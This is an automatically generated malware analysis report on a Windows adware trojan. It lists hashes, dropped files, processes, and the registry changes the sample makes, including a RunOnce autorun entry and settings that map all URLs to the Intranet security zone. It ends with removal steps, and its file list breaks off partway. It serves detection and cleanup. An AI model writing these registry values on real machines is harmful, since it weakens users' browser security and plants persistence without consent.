not-a-virus:AdWare.Win32.ConvertAd.ajzv (Kaspersky), Trojan.Generic.11726935 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 42c7df5771aed3248e8f04ac2affda17
SHA1: 1d7f06dbf7acf03b9be4331d4db120c222c8f374
SHA256: 64ecd33aaed204813ae3748835013aff5a9737a4f4b32072becf631f24f4d783
SSDeep: 6144:uzfj/cK4AtXPDtUoaZDM16 tBdiTqwpnGrJ0X:0/N1ZowZtBATXnOW
Size: 308560 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:35
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsoA.tmp:240
Full_Setup.exe:1912
%original file name%.exe:856
nsg16.tmp:1164
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process nsoA.tmp:240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\vos_n[1].htm (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoF.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv14.tmp (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp\inetc.dll (784 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp (0 bytes)
The process Full_Setup.exe:1912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (6720 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (0 bytes)
The process %original file name%.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\t1.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\CAW1QV4X.htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (9120 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (0 bytes)
The process nsg16.tmp:1164 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1A.tmp (0 bytes)
Registry activity
The process nsoA.tmp:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 09 52 BF 70 EC 4B 64 A2 6F 47 D8 47 2C 99 E2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots in their names that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Full_Setup.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 A0 EE 3E EA FF EC ED 9E E5 55 43 99 D5 13 B5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots in their names that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayName" = "Installer Package"
"Publisher" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayVersion" = "1.0.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 81 A8 B8 DE 6F 45 39 9D 06 7C F8 B7 83 15 F9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots in their names that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsg16.tmp:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 1B 75 21 A0 FB C6 32 EF B8 1E 34 62 03 0E E5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
fb33b9c5234606a7dbf9247e01e8f86a | c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe |
ebce0562cbf6067824e005841744d1cf | c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Uninstall.exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
a3ed6f7ea493b9644125d494fbf9a1e6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\IpConfig.dll |
8531346d16fa5d4768f6530d2eb2b65c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\WmiInspector.dll |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\inetc.dll |
058ba8a0916d957d3b91d08ea2e876e2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\t1.dll |
bb25f5faf1d2329cbad8b763695bc518 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg16.tmp |
8501f079ef3fc63721d0164b8a34b4a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoA.tmp |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu10.tmp\inetc.dll |
bb25f5faf1d2329cbad8b763695bc518 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe |
fb33b9c5234606a7dbf9247e01e8f86a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsoA.tmp:240
Full_Setup.exe:1912
%original file name%.exe:856
nsg16.tmp:1164
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\vos_n[1].htm (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoF.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv14.tmp (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (6720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\t1.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\r[1].htm (2 bytes)
